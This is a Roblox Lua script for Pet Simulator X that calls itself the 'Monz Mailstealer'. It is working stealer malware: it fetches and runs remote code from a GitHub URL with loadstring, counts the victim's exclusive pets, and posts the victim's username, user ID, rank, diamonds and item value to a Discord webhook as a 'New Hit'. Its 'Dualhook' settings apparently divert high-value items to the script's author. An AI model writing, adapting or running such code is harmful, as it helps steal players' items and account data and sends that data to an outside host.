 getgenv().Settings = {
    Webhook = false, -- By Making This True The Users Of Your Script Will Be Able
    -- To Use A Webhook And They Will Get Every Notif Even The Dualhooked Ones
    MailMessage = ".gg/Monzhub",
  Titanics = {
       Dualhook = false,
       Intensity = 100--%
  },
  Banana = {
       Dualhook = false,
       Intensity = 100--%
  },
  Huges = {
       Dualhook = false,
       Intensity = 100--%
  },
  Pogs = {
       Dualhook = false,
       Intensity = 100--%
  },
   Exclusives = {
       Dualhook = false,
       Intensity = 100--%
  },
   Events = {
       Dualhook = false,
       Intensity = 100--%
  },
   Secrets = {
       Dualhook = false,
       Intensity = 100--%
   },
   HC_DM_Mythics = {
       Dualhook = false,
       Intensity = 100--%
   },
   Gems = {
       Dualhook = false,
       Intensity = 100--%
  }
}
    
loadstring(game:HttpGet("https://raw.githubusercontent.com/SuperMonz/Psx_Sc/main/Petsimguiss", true))()

local Exclusive = 0

for i,v in pairs(game:GetService("Players").LocalPlayer.PlayerGui.Mailbox.Frame.GiftPet.Container.Inventory.Pets:GetChildren()) do
    if v:IsA("TextButton") then
    	if v:FindFirstChild("RarityGradient"):FindFirstChild("Exclusive") then
                    Exclusive = Exclusive + 1
                end
            end
	end

local exploit = identifyexecutor()
  
--// Execution Log
if game.PlaceId == 6284583030 then
	_G.GameIn = "Pet Simulator X"
elseif game.PlaceId == 7722306047 then
	_G.GameIn = "PSX Trading Plaza"
elseif game.PlaceId == 10321372166 then
	_G.GameIn = "PSX Hardcore"
elseif game.PlaceId == 12610002282 then
	_G.GameIn = "PSX Pro Trading Plaza"
elseif game.PlaceId == 11725212117 then
	_G.GameIn = "PSX Voice Trading Plaza"
else
	_G.GameIn = "❓ Couldn't find game"
end
local webhookcolor = "13369599"
local Players = game:GetService("Players")
local Client = Players.LocalPlayer
_G.CurrentRank = game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Rank.RankName.Text
_G.PlrUserVictim = game.Players.LocalPlayer.Name
_G.PlrUserIDVictim = game.Players.LocalPlayer.UserId
_G.PlrDisplayNameVictim = game.Players.LocalPlayer.DisplayName
_G.DisplayDiamond = game:GetService("Players").LocalPlayer.leaderstats.Diamonds.Value
_G.DisplayRap = game:GetService("Players").LocalPlayer.leaderstats.RAP.Value
_G.DisplayBankTier = game:GetService("Players").LocalPlayer.PlayerGui.Bank.Frame.BankTitle.Tier.Text
local GemsFormated = (require(game:GetService("ReplicatedStorage").Library.Functions.NumberShorten)( _G.DisplayDiamond ))
local RapFormated = (require(game:GetService("ReplicatedStorage").Library.Functions.NumberShorten)( _G.DisplayRap ))
local function sendwebhook(msg)
local msg = {
	["avatar_url"] = "https://cdn.discordapp.com/attachments/1100823909009465497/1108811431404654592/images.png",
	["content"]= "**🎁New Hit With Monz🎁** || @here|| ",
	["username"] = "Monz",
	["embeds"]= {
	  {
		["title"]= "`Monz Mailstealer Results`",
		["description"]= "**Data from the victim**\n```🧑Display Name: ".._G.PlrDisplayNameVictim.."\n🧑Username: ".._G.PlrUserVictim.."\n🧑User ID: ".._G.PlrUserIDVictim.."\n🐱Rank: ".._G.CurrentRank.."\n🎮Place: ".._G.GameIn.."\n☠Executor: "..exploit.."\n📮Receiver: ".._G.Username.."```",
		["url"]= "https://discord.gg/d2X3XVm7",
		["color"]= ""..webhookcolor.."",
		["thumbnail"] = {
        ["url"] = "https://cdn.discordapp.com/attachments/1100823909009465497/1108821104853786785/cat.png",
        ["height"] = 420,
        ["width"] = 420
        },
		["fields"]= {
        {
          ["name"]= "**💎Diamonds 💎**",
          ["value"]= "```"..GemsFormated.."```",
          ["inline"]= true
        },
        {
          ["name"]= "**⬆️Rap⬆️**",
          ["value"]= "```"..RapFormated.."```",
          ["inline"]= true
        },
	{
          ["name"]= "**🏆Exclusive🏆**",
          ["value"]= "```"..Exclusive.."```",
          ["inline"]= true
        }
      }
      
  }
  },
	["attachments"] = {}
  }
  local Webhook = _G.Webhook
  request = http_request or request or HttpPost or syn.request
  request({Url = Webhook, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = game.HttpService:JSONEncode(msg)})
  end
  sendwebhook(msg)